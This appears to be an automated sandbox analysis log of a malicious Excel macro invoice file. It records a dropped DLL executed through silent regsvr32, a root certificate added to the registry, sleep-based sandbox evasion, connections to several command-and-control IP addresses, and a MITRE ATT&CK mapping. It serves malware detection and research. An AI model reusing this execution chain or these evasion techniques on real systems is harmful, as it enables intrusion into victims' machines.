Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: k04qkvqu[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: k04qkvqu[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: k04qkvqu[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: k04qkvqu[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLSM@9/21@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INV8073565781-20210111319595.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2300
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC7A2.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: INV8073565781-20210111319595.xlsmVirustotal: Detection: 44%
Source: INV8073565781-20210111319595.xlsmReversingLabs: Detection: 32%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INV8073565781-20210111319595.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: INV8073565781-20210111319595.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV8073565781-20210111319595.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: k04qkvqu[1].zip.0.drStatic PE information: section name: .rdata3
Source: k04qkvqu[1].zip.0.drStatic PE information: section name: .2
Source: k04qkvqu[1].zip.0.drStatic PE information: section name: .rdata2
Source: k04qkvqu[1].zip.0.drStatic PE information: section name: .text4
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001CBFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00197172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001B62CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001AF6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0019899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001989CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BFB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00191D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00190E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001A88DD rdtsc
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2856Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -760000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -825000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -393000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -432000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -870000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -1424000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -507000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -516000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -355000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -716000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -632000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -678000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -572000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -512000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -1548000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -369000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -1264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -277000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -830000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -333000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -417000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -564000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -281000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -530000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -520000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -580000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -636000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -154000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -438000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -441000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -552000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -578000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -274000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -465000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -399000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -488000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -287000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -249000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -346000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -259000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -136000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -321000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000Thread sleep time: -358000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2908Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001A88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001CB5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001CB6E0 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

